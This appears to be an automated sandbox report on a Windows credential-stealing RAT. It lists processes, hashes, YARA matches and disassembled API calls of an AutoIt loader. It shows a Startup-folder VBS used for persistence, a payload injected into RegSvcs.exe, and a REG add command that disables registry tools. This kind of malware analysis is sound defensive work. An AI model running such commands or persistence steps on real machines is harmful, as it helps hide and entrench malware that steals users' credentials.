Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:10:58
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs"
Imagebase:	0x7ff6ec090000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:10:59
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\ghauts\vaccinatory.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"
Imagebase:	0x7c0000
File size:	985'600 bytes
MD5 hash:	5A08CE9FCE5F6482D2A785E0117370BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:11:00
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"
Imagebase:	0xa90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2538612035.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2536490753.0000000000414000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	22:11:02
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:11:02
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	157

Executed Functions

Function 00183B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B68
IsDebuggerPresent.KERNEL32 ref: 00183B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,002452F8,002452E0,?,?), ref: 00183BEB

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

Part of subcall function 0019092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C14,002452F8,?,?,?), ref: 0019096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00183C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00237770,00000010), ref: 001BD281
SetCurrentDirectoryW.KERNEL32(?,002452F8,?,?,?), ref: 001BD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00234260,002452F8,?,?,?), ref: 001BD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 001BD346

Part of subcall function 00183A46: GetSysColorBrush.USER32(0000000F), ref: 00183A50
Part of subcall function 00183A46: LoadCursorW.USER32(00000000,00007F00), ref: 00183A5F
Part of subcall function 00183A46: LoadIconW.USER32(00000063), ref: 00183A76
Part of subcall function 00183A46: LoadIconW.USER32(000000A4), ref: 00183A88
Part of subcall function 00183A46: LoadIconW.USER32(000000A2), ref: 00183A9A
Part of subcall function 00183A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AC0
Part of subcall function 00183A46: RegisterClassExW.USER32(?), ref: 00183B16

Part of subcall function 001839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A03
Part of subcall function 001839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A24
Part of subcall function 001839D5: ShowWindow.USER32(00000000,?,?), ref: 00183A38
Part of subcall function 001839D5: ShowWindow.USER32(00000000,?,?), ref: 00183A41

Part of subcall function 0018434A: _memset.LIBCMT ref: 00184370
Part of subcall function 0018434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00184415

Strings

runas, xrefs: 001BD33A
%!, xrefs: 00183C44
This is a third-party compiled AutoIt script., xrefs: 001BD279

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%!
API String ID: 529118366-3827880107
Opcode ID: 7b6e34eb82f973d87b82b4e450ef7ba00ea9322d73608de97276bae68b0ad9b1
Instruction ID: 38d958e1abe8cf2d198aa91df12d4aebbe3b5fa3ba98bfc017eb1686b76f9d3a
Opcode Fuzzy Hash: 7b6e34eb82f973d87b82b4e450ef7ba00ea9322d73608de97276bae68b0ad9b1
Instruction Fuzzy Hash: D951F475908648AFCF15FBB4EC09AED7B79AB16710F144066F861A21A3DBB09705CF21

Function 001849A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001849CD

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

GetCurrentProcess.KERNEL32(?,0020FAEC,00000000,00000000,?), ref: 00184A9A
IsWow64Process.KERNEL32(00000000), ref: 00184AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00184AE7
FreeLibrary.KERNEL32(00000000), ref: 00184AF2
GetSystemInfo.KERNEL32(00000000), ref: 00184B23
GetSystemInfo.KERNEL32(00000000), ref: 00184B2F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 50309e4cf397ecd57f4afceec548e1a313a8053c10eb3e2aca7eb71b240e08d6
Instruction ID: 06f594c59a27a6567d1069930b5eb09f7229490c0b518cd88339f565fdcb42bf
Opcode Fuzzy Hash: 50309e4cf397ecd57f4afceec548e1a313a8053c10eb3e2aca7eb71b240e08d6
Instruction Fuzzy Hash: 3591F4359897C1DBC739EB7895501AAFFF4AF2A300B0449AED0CB97A41D720A608CB59

Function 00184E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00184D8E,?,?,00000000,00000000), ref: 00184E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00184D8E,?,?,00000000,00000000), ref: 00184EB0
LoadResource.KERNEL32(?,00000000,?,?,00184D8E,?,?,00000000,00000000,?,?,?,?,?,?,00184E2F), ref: 001BD937
SizeofResource.KERNEL32(?,00000000,?,?,00184D8E,?,?,00000000,00000000,?,?,?,?,?,?,00184E2F), ref: 001BD94C
LockResource.KERNEL32(00184D8E,?,?,00184D8E,?,?,00000000,00000000,?,?,?,?,?,?,00184E2F,00000000), ref: 001BD95F

Strings

SCRIPT, xrefs: 00184EA6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 30982a909bc88b407df168734d8a3160b0e9c583475cc6ae1c928b279b0c2344
Instruction ID: da02c4a84a860300194030a0680f562cc77f091b1c77b8537788b0f07c0dcc4f
Opcode Fuzzy Hash: 30982a909bc88b407df168734d8a3160b0e9c583475cc6ae1c928b279b0c2344
Instruction Fuzzy Hash: 90115A75280701BFD7219BA5ED48F677BBAFBC5B11F208268F80696650EB61E9008A60

Function 0018E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dd$, xrefs: 001C3AF5
Variable must be of type 'Object'., xrefs: 001C3E62
Dd$, xrefs: 0018EABA
Dd$, xrefs: 0018EAC1
Dd$, xrefs: 001C3B2E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID: Dd$$Dd$$Dd$$Dd$$Variable must be of type 'Object'.
API String ID: 0-443921075
Opcode ID: 2cbf1cf002b3e48c1707b5ddc97a020cfa6b279631f44a50f54322417b0301fc
Instruction ID: 7e9f3b6e405afe4748152c003c52210f045b480f89ebc7193975cdce77d0fb61
Opcode Fuzzy Hash: 2cbf1cf002b3e48c1707b5ddc97a020cfa6b279631f44a50f54322417b0301fc
Instruction Fuzzy Hash: B0A26874A00215CFCB28EF98C484AAEB7F2FB59314F258069E915AB351D771EE42CF91

Function 001E445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,001BE398), ref: 001E446A
FindFirstFileW.KERNELBASE(?,?), ref: 001E447B
FindClose.KERNEL32(00000000), ref: 001E448B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
Instruction ID: 714733d9a7d1adce28cf40c22495dc9cf489066ca1e9999185df26bec936b857
Opcode Fuzzy Hash: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
Instruction Fuzzy Hash: 07E0DF36910A416B9220AB38FC0D8EE779C9E05335F240726FA35C28E1EBB499009696

Function 001909D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190A5B
timeGetTime.WINMM ref: 00190D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190E53
Sleep.KERNEL32(0000000A), ref: 00190E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00190EFA
DestroyWindow.USER32 ref: 00190F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00190F20
Sleep.KERNEL32(0000000A,?,?), ref: 001C4E83
TranslateMessage.USER32(?), ref: 001C5C60
DispatchMessageW.USER32(?), ref: 001C5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001C5C82

Strings

pb$, xrefs: 001C5003
@GUI_CTRLID, xrefs: 001C4F3A
@GUI_CTRLHANDLE, xrefs: 001C4FE4
pb$, xrefs: 001C4FAE
@GUI_WINHANDLE, xrefs: 001C4F8F
pb$, xrefs: 001C57B4
@TRAY_ID, xrefs: 001C578F
pb$, xrefs: 001C4F59
@COM_EVENTOBJ, xrefs: 001C54F0

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$$pb$$pb$$pb$
API String ID: 4212290369-434862197
Opcode ID: 6d9b68d622ec0662104fdc33183a032f5d1992f53663144e5b8440fe0ae78368
Instruction ID: 38d13913a13c32e183971b2a3512fa0d8560236990e6432e679405941e31aff7
Opcode Fuzzy Hash: 6d9b68d622ec0662104fdc33183a032f5d1992f53663144e5b8440fe0ae78368
Instruction Fuzzy Hash: 09B2E470608741DFDB29DF24C884FAAB7E5BFA5304F14491DF48A972A1DB71E984CB82

Function 001E9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E8F5F: __time64.LIBCMT ref: 001E8F69

Part of subcall function 00184EE5: _fseek.LIBCMT ref: 00184EFD

__wsplitpath.LIBCMT ref: 001E9234

Part of subcall function 001A40FB: __wsplitpath_helper.LIBCMT ref: 001A413B

_wcscpy.LIBCMT ref: 001E9247
_wcscat.LIBCMT ref: 001E925A
__wsplitpath.LIBCMT ref: 001E927F
_wcscat.LIBCMT ref: 001E9295
_wcscat.LIBCMT ref: 001E92A8

Part of subcall function 001E8FA5: _memmove.LIBCMT ref: 001E8FDE
Part of subcall function 001E8FA5: _memmove.LIBCMT ref: 001E8FED

_wcscmp.LIBCMT ref: 001E91EF

Part of subcall function 001E9734: _wcscmp.LIBCMT ref: 001E9824
Part of subcall function 001E9734: _wcscmp.LIBCMT ref: 001E9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E9452
_wcsncpy.LIBCMT ref: 001E94C5
DeleteFileW.KERNEL32(?,?), ref: 001E94FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001E9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E9534

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 78557b56112bdef3b463af19171cb947372d490516c148180cbfd6ebcad246fe
Instruction ID: 12dd6d22cc8fd57b97995ace594e93fb58cb7ba92c61e3f2b6e492d8afe7f9b7
Opcode Fuzzy Hash: 78557b56112bdef3b463af19171cb947372d490516c148180cbfd6ebcad246fe
Instruction Fuzzy Hash: 18C14AB1D00219ABDF25DFA5CC85ADEB7BDEFA5310F0040AAF609E7151EB709A448F61

Function 0018301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00183074
RegisterClassExW.USER32(00000030), ref: 0018309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
InitCommonControlsEx.COMCTL32(?), ref: 001830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
LoadIconW.USER32(000000A9), ref: 001830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101

Strings

TaskbarCreated, xrefs: 001830A4
AutoIt v3 GUI, xrefs: 00183090
0, xrefs: 00183056
+, xrefs: 0018305D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d9eb615ea33e3211a5d9785cbc23affcd7052681bac337cb5333bd0a784a3893
Instruction ID: 997ff03aecb3129be8e6a3c259c6a73b614ceaa98c1aac91a770a102a97974c4
Opcode Fuzzy Hash: d9eb615ea33e3211a5d9785cbc23affcd7052681bac337cb5333bd0a784a3893
Instruction Fuzzy Hash: 3F314975890319EFDB90CFA4E989AC9BBF0FF0A710F10412AE580E66A2D7B50585CF91

Function 00183041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00183074
RegisterClassExW.USER32(00000030), ref: 0018309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
InitCommonControlsEx.COMCTL32(?), ref: 001830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
LoadIconW.USER32(000000A9), ref: 001830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101

Strings

TaskbarCreated, xrefs: 001830A4
AutoIt v3 GUI, xrefs: 00183090
0, xrefs: 00183056
+, xrefs: 0018305D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6883064f91b3b6f62a10f8f18187a4d805e9fd2bbdfe9b4cef3ce40c1f48a04c
Instruction ID: 5dec0c9e0edac80ff1f32d9675729a09b2375482c254b6918b29928e80015619
Opcode Fuzzy Hash: 6883064f91b3b6f62a10f8f18187a4d805e9fd2bbdfe9b4cef3ce40c1f48a04c
Instruction Fuzzy Hash: F62124B5980718AFDB50DFA4FD8CB8DBBF5FB09700F00412AF950A62A2DBB105848F91

Function 0018708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00184706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002452F8,?,001837AE,?), ref: 00184724

Part of subcall function 001A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00187165), ref: 001A052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001871A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001BE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001BE909
RegCloseKey.ADVAPI32(?), ref: 001BE947
_wcscat.LIBCMT ref: 001BE9A0

Strings

\Include\, xrefs: 00187165
Software\AutoIt v3\AutoIt, xrefs: 0018719E
Include, xrefs: 001BE8BF, 001BE900
\, xrefs: 001BE9C3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 9267c8ad3c91adeb0f9f6ed7b3a674aa37190de1878abdfd064822d3876b5f9b
Instruction ID: 79133fbd0b1aa0f2520e488cb4ad7118e8c02c27b869571562280e683b0f0563
Opcode Fuzzy Hash: 9267c8ad3c91adeb0f9f6ed7b3a674aa37190de1878abdfd064822d3876b5f9b
Instruction Fuzzy Hash: 1A718F75508301AEC714EF65FC499ABBBE8FF9B310B50052EF845871A1DBB1DA48CB52

Function 00183633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 001836D2
KillTimer.USER32(?,00000001), ref: 001836FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0018371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0018372A
CreatePopupMenu.USER32 ref: 0018373E
PostQuitMessage.USER32(00000000), ref: 0018374D

Strings

TaskbarCreated, xrefs: 00183725
%!, xrefs: 001BD081, 001BD0CF

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%!
API String ID: 129472671-72691048
Opcode ID: 4439f14580b5c4285c88db2914c2375168c6b1346300ff9d2bee522331870c01
Instruction ID: 9015f21e0965d5cabcc1186d2c88d706a639fc98ea266982de5d0afe16f0eb20
Opcode Fuzzy Hash: 4439f14580b5c4285c88db2914c2375168c6b1346300ff9d2bee522331870c01
Instruction Fuzzy Hash: 91414CB1100A05BBDB28BF68FC0DB7D3755EB11700F280525F552962A3EB619F519B62

Function 00183A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00183A50
LoadCursorW.USER32(00000000,00007F00), ref: 00183A5F
